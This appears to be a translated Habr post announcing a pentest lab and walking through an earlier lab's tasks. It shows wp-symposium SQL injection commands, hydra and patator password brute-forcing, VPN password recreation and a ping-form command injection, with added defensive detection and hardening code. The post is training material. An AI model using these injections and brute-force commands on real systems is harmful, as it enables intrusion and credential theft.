
50 shades of token



Tomorrow at 12:00 Moscow time, a new penetration testing lab “Test lab 12” will be launched, which is a copy of the real corporate network with its inherent vulnerabilities and configuration errors. The laboratory’s website already has 25,000 registered participants, including leading information security experts from major Russian and international companies.

Below is information on the composition of the new laboratory, examples of finding and exploiting vulnerabilities, and material for training.

The main focus of the laboratories is realism: the IT infrastructure is modelled on the corporate networks of real companies, so that the participants' actions come close to a real intrusion. Participants act as attackers and try to exploit the vulnerabilities planted in the lab; on success they gain access to individual laboratory nodes, each of which holds a token. The winner is the participant who first collects all the tokens, which in effect means full control over the virtual corporate network.

Anyone, regardless of skill level, can test their penetration testing skills in conditions as close to real as possible without breaking the law.

The new laboratory will consist of a distributed computer network, represented as several perimeters with different levels of intrusion difficulty. The first (outer) perimeter will be the easiest to break through; further on, progress becomes more difficult. In the most difficult sector we place vulnerabilities that are difficult to exploit with a large number of participants. This approach allows us to solve two problems at once:




The following were used in building the laboratory:


Passing the laboratory will require:


Private Lab Penetration Testing


We decided to publish walkthroughs of several tasks from the past private laboratory, developed this summer, to help novice specialists quickly acquire basic competencies.

All information regarding the composition of the laboratory (systems, users, etc.) is fictional and serves only to create its realistic image.

The penetration testing techniques described in the article are educational in nature. Do not violate the law.

The entire infrastructure of the fictional UNIONSEC organization, consisting of 15 servers, was located behind the gateway 192.168.102.10, reachable once a VPN connection was established. The participants were given the task of compromising the laboratory's corporate network. Exploiting each planted vulnerability yielded a token that had to be submitted through the form on lab.pentestit.ru.



Seven teams of two participants attacked the laboratory, but none managed to compromise the entire network. Nevertheless, some teams showed decent results.



Working in the laboratory required experience with various tools and with penetration testing in general. In addition, some tasks could not be completed without development and reverse engineering skills. Considering the limited time the participants were given, completing almost half of the tasks is, in our opinion, a worthy result.



Reconnaissance


Using the nmap utility, we get a list of open ports:

nmap 192.168.102.10 -sV





The company website


At 192.168.102.10, in the "Contact us" section, we see a list of e-mail addresses:


From the application's HTML source we can infer that it runs the WordPress CMS and includes the plugin wp-symposium-15.1.

Through www.exploit-db.com we determine that this plugin is vulnerable to SQL injection via the size parameter of the URI 192.168.102.10/wp-content/plugins/wp-symposium-15.1/get_album_item.php?size= . We try to exploit the vulnerability using a BASH script:

#!/bin/bash
# Enumerate database names one row at a time through the injectable size parameter
for ((i=0; i<=10; i++)); do
  wget --no-proxy -q -O- "http://192.168.102.10/wp-content/plugins/wp-symposium-15.1/get_album_item.php?size=SCHEMA_NAME FROM INFORMATION_SCHEMA.SCHEMATA limit 1 offset $i; --"
  echo ""
done

We get the list of databases:

information_schema
wp_db


and after exploiting the vulnerability, the token:

wget -q -O- "http://192.168.102.10/wp-content/plugins/wp-symposium-15.1/get_album_item.php?size=* from token; --"
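From the defender's side, the injection above leaves a clear trace in the web server's access log: SQL keywords and comment sequences inside the size parameter of get_album_item.php. The following detector is an added example, not part of the original article; the log lines it scans are constructed samples in Apache combined format, and the client IPs in them are made up.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample access-log lines (Apache combined format); not real lab traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [12/Dec/2018:11:02:01 +0300] "GET /wp-content/plugins/wp-symposium-15.1/get_album_item.php?size=SCHEMA_NAME%20FROM%20INFORMATION_SCHEMA.SCHEMATA%20limit%201%20offset%200;%20-- HTTP/1.1" 200 17 "-" "Wget/1.19"
10.0.0.5 - - [12/Dec/2018:11:02:02 +0300] "GET /wp-content/plugins/wp-symposium-15.1/get_album_item.php?size=*%20from%20token;%20-- HTTP/1.1" 200 42 "-" "Wget/1.19"
10.0.0.7 - - [12/Dec/2018:11:03:10 +0300] "GET /wp-content/plugins/wp-symposium-15.1/get_album_item.php?size=thumb HTTP/1.1" 200 5120 "http://192.168.102.10/" "Mozilla/5.0"
10.0.0.9 - - [12/Dec/2018:11:04:00 +0300] "GET /index.php HTTP/1.1" 200 8000 "-" "Mozilla/5.0"
"""

# client ip, timestamp, method, request path, status
REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})')
# Tokens that never appear in a legitimate size= value (it should be a short keyword like "thumb")
SQL_HINT_RE = re.compile(r"\b(from|information_schema|union|select)\b|--|;", re.I)


def find_symposium_sqli(log_text):
    """Return (client_ip, decoded size value) for every suspicious get_album_item.php request."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        ip, _ts, _method, path, _status = m.groups()
        if "get_album_item.php" not in path or "?" not in path:
            continue
        query = path.split("?", 1)[1]
        params = dict(p.split("=", 1) for p in query.split("&") if "=" in p)
        size = unquote_plus(params.get("size", ""))  # decode before matching, as the DB would see it
        if SQL_HINT_RE.search(size):
            hits.append((ip, size))
    return hits


if __name__ == "__main__":
    for ip, payload in find_symposium_sqli(SAMPLE_LOG):
        print("suspicious request from %s: size=%r" % (ip, payload))
```

The same check is a natural candidate for a WAF rule or a SIEM correlation on repeated hits from one client, which is exactly the pattern the enumeration loop above produces.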





Mail


We brute-force the mail credentials using hydra:

hydra smtp://192.168.101.10 -s 25 -L /tmp/emails -P /tmp/pass



Using the obtained credentials, we log in to the mail server's web interface and get the token:




OpenVPN


Connection

From the website http://192.168.102.10:88 we download the file “openvpn.conf”. After scanning the server (for example, with the DirBuster utility), we find a .bash_history file:

-bash: generating new OpenVPN password for user admin: command not found
-bash: generating: command not found
-bash: date +%F: command not found
-bash: echo "admin:`date +%F | md5sum | sed -s 's/ -//'`" > /etc/openvpn/user.pass: command not found
cat /etc/openvpn/user.pass
service openvpn restart
exit


which reveals the user name as well as the password generation algorithm. To reproduce the previously generated password, we use the exact creation date of the file:



and apply the transformation from the command history. The resulting password is used for VPN authentication.

Server scan

Having connected to the VPN, we scan the server's ports:



We get the token at http://10.255.0.1:8080 :





TERMINAL


The VPN server pushes several routes to internal networks; scanning them, we discover several hosts with port 22 open. We try to log in with the dev account. Having connected to one of the servers, we find the /home/support directory and try to brute-force the password of the account of the same name:

patator ssh_login host=192.168.11.5 user=support password=FILE0 0=/usr/share/wordlists/rockyou.txt -x ignore:fgrep='Authentication failed'



Having found the password, we get the token located in the home directory:



Reverse engineering


On the TERMINAL server we find the executable admin.bin, which asks for a password and exits. By reversing it we recover the password fv34cm3cm, which is a token. Entering it yields an SSH private key.

Using the private key, we authenticate to the server 192.168.11.2, where we find the file /opt/dump.pcap. We analyze the network traffic dump and extract the token as well as the password for BASIC authentication on the web server 192.168.11.3:

tcpdump -r /tmp/dump.pcap -A | grep token





API


At 192.168.11.3 there is an API that is accessible only from the administrator's PC. By forwarding ports (for example, through SSH), we begin studying it.

Having exploited the vulnerability found in the API, we get a token that is part of the admin user password:



A web application under development is available at http://172.16.0.4. From the file readme.html we get a list of the pages being developed:



Opening http://172.16.0.4/availability.php returns an error. We repeat the request with the Referer header set to http://172.16.0.4/index.html, after which a form with a ping button becomes available:



Having confirmed that the input field is not filtered, we get the token:
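The root cause of that token is a ping form that pastes user input into a shell command. As an added example (not code from the lab or the article), the block below contrasts that pattern with a hardened handler: the target is validated as an IP literal or a DNS hostname and ping is invoked as an argument vector without a shell, so metacharacters such as ";" and "|" are never interpreted. The function names are mine.

```python
import ipaddress
import re
import subprocess

# RFC 1123 style hostname: labels of letters, digits and hyphens, no leading/trailing hyphen
HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
    r"(\.[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?)*$"
)


def vulnerable_ping_command(target):
    """The unfiltered pattern: user input concatenated into a shell string.
    Run with shell=True, everything after ';' or '|' in target executes too."""
    return "ping -c 1 " + target


def validate_target(target):
    """Accept only an IP address literal or a hostname; raise ValueError for anything else."""
    try:
        return str(ipaddress.ip_address(target))
    except ValueError:
        pass
    if HOSTNAME_RE.match(target):
        return target
    raise ValueError("invalid ping target: %r" % target)


def safe_ping_command(target):
    """Argument vector for subprocess.run(..., shell=False); no shell parses it."""
    return ["ping", "-c", "1", validate_target(target)]


def run_ping(target, timeout=5):
    """Hardened handler: validation first, then exec without a shell. Returns ping's exit code."""
    proc = subprocess.run(safe_ping_command(target), capture_output=True, text=True, timeout=timeout)
    return proc.returncode


if __name__ == "__main__":
    print(vulnerable_ping_command("172.16.0.1; id"))  # the string a shell would happily run
    print(safe_ping_command("172.16.0.1"))
    try:
        safe_ping_command("172.16.0.1; id")
    except ValueError as exc:
        print("rejected:", exc)
```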


We connect via SSH to the server 172.16.0.1. After logging in, we are greeted by a script that asks for a 5-digit PIN:



Using a self-written PIN guessing script, we get full access to the console and find the file with the token in the user's folder:




Back to the Future


To get up to speed quickly with the new, 12th laboratory, we have prepared a short list of materials and tools:


See you in “Test lab 12” and let the strongest win!

Source: https://habr.com/ru/post/432940/
